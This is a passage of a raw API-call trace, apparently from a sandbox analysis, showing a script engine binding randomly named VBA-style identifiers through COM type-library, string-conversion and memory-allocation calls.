_Src="_B_var_AkwDAG_Q" | out: _Dst="_B_var_AkwDAG_Q") returned 0x0 [0068.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_AkwDAG_Q") returned 16 [0068.440] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.440] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AkwDAG_Q", lHashVal=0x108115, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.440] IUnknown:Release (This=0x665ba50) returned 0xb [0068.440] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.440] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AkwDAG_Q", lHashVal=0x108115, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.440] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.440] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.440] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AkwDAG_Q", lHashVal=0x108115, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.440] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.440] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.440] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AkwDAG_Q", lHashVal=0x108115, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.440] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.440] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.440] IUnknown:Release (This=0x665ba50) returned 0xb [0068.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc199a, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_AkwDAG_Q") returned 16 [0068.440] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AkwDAG_Q", lHashVal=0x108115, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x41005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x41005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0068.440] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba25b2 | out: _Dst=0x145020) returned 0x0 [0068.440] IMalloc:Realloc (This=0x7fefec05380, pv=0x6844090, cb=0x2000) returned 0x6288170 [0068.440] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2586, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="XCQGAAAA") returned 9 [0068.440] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XCQGAAAA", lHashVal=0x10bb7a, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2586, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="XCQGAAAA") returned 9 [0068.441] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XCQGAAAA", lHashVal=0x10bb7a, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2586, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="XCQGAAAA") returned 9 [0068.441] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XCQGAAAA", lHashVal=0x10bb7a, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.441] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XCQGAAAA") returned 0x10bb7a [0068.441] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="XCQGAAAA" | out: _Dst="XCQGAAAA") returned 0x0 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="XCQGAAAA") returned 9 [0068.441] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.441] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XCQGAAAA", lHashVal=0x10bb7a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.441] IUnknown:Release (This=0x665ba50) returned 0xb [0068.441] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.441] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XCQGAAAA", lHashVal=0x10bb7a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.441] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.441] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.441] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XCQGAAAA", lHashVal=0x10bb7a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.441] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.441] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.441] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XCQGAAAA", lHashVal=0x10bb7a, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.441] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.441] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2586, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="XCQGAAAA") returned 9 [0068.441] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XCQGAAAA", lHashVal=0x10bb7a, wFlags=0x5, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.441] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d60 [0068.441] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x9, _Src=0x3ba2586 | out: _Dst=0x67c2d60) returned 0x0 [0068.441] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XCQGAAAA") returned 0x109303 [0068.441] strcpy_s (in: _Dst=0x144fb0, _DstSize=0x10, _Src="_B_var_XCQGAAAA" | out: _Dst="_B_var_XCQGAAAA") returned 0x0 [0068.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=16, lpWideCharStr=0x144e00, cchWideChar=16 | out: lpWideCharStr="_B_var_XCQGAAAA") returned 16 [0068.442] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.442] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XCQGAAAA", lHashVal=0x109303, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.442] IUnknown:Release (This=0x665ba50) returned 0xb [0068.442] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.442] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XCQGAAAA", lHashVal=0x109303, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.442] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.442] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.442] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XCQGAAAA", lHashVal=0x109303, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.442] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.442] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.442] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XCQGAAAA", lHashVal=0x109303, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.442] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.442] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.442] IUnknown:Release (This=0x665ba50) returned 0xb [0068.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc19ca, cbMultiByte=16, lpWideCharStr=0x144e60, cchWideChar=17 | out: lpWideCharStr="_B_var_XCQGAAAA") returned 16 [0068.442] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XCQGAAAA", lHashVal=0x109303, wFlags=0x5, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x58005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.442] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x9, _Src=0x3ba2586 | out: _Dst=0x145020) returned 0x0 [0068.442] ITypeComp:RemoteBind (in: This=0x665ba60, szName="IAQDB_G", lHashVal=0x10fb3e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25de, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="IAQDB_G") returned 8 [0068.442] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="IAQDB_G", lHashVal=0x10fb3e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.442] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25de, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="IAQDB_G") returned 8 [0068.442] ITypeComp:RemoteBind (in: This=0x665bd30, szName="IAQDB_G", lHashVal=0x10fb3e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.442] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="IAQDB_G") returned 0x10fb3e [0068.443] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="IAQDB_G" | out: _Dst="IAQDB_G") returned 0x0 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="IAQDB_G") returned 8 [0068.443] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.443] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="IAQDB_G", lHashVal=0x10fb3e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.443] IUnknown:Release (This=0x665ba50) returned 0xb [0068.443] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.443] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="IAQDB_G", lHashVal=0x10fb3e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.443] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.443] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.443] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="IAQDB_G", lHashVal=0x10fb3e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.443] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.443] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.443] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="IAQDB_G", lHashVal=0x10fb3e, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.443] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba25de, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="IAQDB_G") returned 8 [0068.443] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="IAQDB_G", lHashVal=0x10fb3e, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.443] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.443] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba25de | out: _Dst=0x67c2d60) returned 0x0 [0068.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_IAQDB_G") returned 0x10fec2 [0068.443] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_IAQDB_G" | out: _Dst="_B_var_IAQDB_G") returned 0x0 [0068.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 | out: lpWideCharStr="_B_var_IAQDB_G") returned 15 [0068.443] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.443] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_IAQDB_G", lHashVal=0x10fec2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.443] IUnknown:Release (This=0x665ba50) returned 0xb [0068.443] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.443] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_IAQDB_G", lHashVal=0x10fec2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.443] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.443] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.443] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_IAQDB_G", lHashVal=0x10fec2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.444] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.444] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.444] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_IAQDB_G", lHashVal=0x10fec2, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.444] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.444] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.444] IUnknown:Release (This=0x665ba50) returned 0xb [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc19fa, cbMultiByte=15, lpWideCharStr=0x144e60, cchWideChar=16 | out: lpWideCharStr="_B_var_IAQDB_G") returned 15 [0068.444] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_IAQDB_G", lHashVal=0x10fec2, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x49005f00720061, ppTypeComp=0x42004400000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x49005f00720061, ppTypeComp=0x42004400000000, pDummy=0x0) returned 0x0 [0068.444] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x8, _Src=0x3ba25de | out: _Dst=0x145020) returned 0x0 [0068.444] IMalloc:Realloc (This=0x7fefec05380, pv=0x62b9100, cb=0x1000) returned 0x6844090 [0068.444] ITypeComp:RemoteBind (in: This=0x665ba60, szName="KZwoAQ", lHashVal=0x10fb40, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2606, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="KZwoAQ") returned 7 [0068.444] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="KZwoAQ", lHashVal=0x10fb40, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2606, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="KZwoAQ") returned 7 [0068.444] ITypeComp:RemoteBind (in: This=0x665bd30, szName="KZwoAQ", lHashVal=0x10fb40, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.444] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="KZwoAQ") returned 0x10fb40 [0068.444] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="KZwoAQ" | out: _Dst="KZwoAQ") returned 0x0 [0068.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="KZwoAQ") returned 7 [0068.444] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.444] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="KZwoAQ", lHashVal=0x10fb40, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.444] IUnknown:Release (This=0x665ba50) returned 0xb [0068.444] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.444] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="KZwoAQ", lHashVal=0x10fb40, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.445] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.445] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.445] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="KZwoAQ", lHashVal=0x10fb40, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.445] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.445] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.445] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="KZwoAQ", lHashVal=0x10fb40, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.445] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2606, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="KZwoAQ") returned 7 [0068.445] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="KZwoAQ", lHashVal=0x10fb40, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.445] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.445] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba2606 | out: _Dst=0x67c2d60) returned 0x0 [0068.445] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_KZwoAQ") returned 0x1075aa [0068.445] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_KZwoAQ" | out: _Dst="_B_var_KZwoAQ") returned 0x0 [0068.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_KZwoAQ") returned 14 [0068.445] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.445] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_KZwoAQ", lHashVal=0x1075aa, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.445] IUnknown:Release (This=0x665ba50) returned 0xb [0068.445] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.445] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_KZwoAQ", lHashVal=0x1075aa, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.445] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.445] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.445] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_KZwoAQ", lHashVal=0x1075aa, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.445] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.445] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.445] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_KZwoAQ", lHashVal=0x1075aa, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.445] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.445] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.445] IUnknown:Release (This=0x665ba50) returned 0xb [0068.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1a2a, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_KZwoAQ") returned 14 [0068.446] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_KZwoAQ", lHashVal=0x1075aa, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x4b005f00720061, ppTypeComp=0x41006f00000000, pDummy=0x0) returned 0x0 [0068.446] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba2606 | out: _Dst=0x145020) returned 0x0 [0068.446] ITypeComp:RemoteBind (in: This=0x665ba60, szName="aA1UQGXo", lHashVal=0x10fe52, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba265a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="aA1UQGXo") returned 9 [0068.446] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="aA1UQGXo", lHashVal=0x10fe52, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba265a, cbMultiByte=9, lpWideCharStr=0x144ea0, cchWideChar=10 | out: lpWideCharStr="aA1UQGXo") returned 9 [0068.446] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aA1UQGXo", lHashVal=0x10fe52, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.446] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aA1UQGXo") returned 0x10fe52 [0068.446] strcpy_s (in: _Dst=0x144e00, _DstSize=0x9, _Src="aA1UQGXo" | out: _Dst="aA1UQGXo") returned 0x0 [0068.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=9, lpWideCharStr=0x144c50, cchWideChar=9 | out: lpWideCharStr="aA1UQGXo") returned 9 [0068.446] IUnknown:AddRef (This=0x665ba50) returned 0xc [0068.446] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aA1UQGXo", lHashVal=0x10fe52, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.446] IUnknown:Release (This=0x665ba50) returned 0xb [0068.446] IUnknown:AddRef (This=0x631b4c0) returned 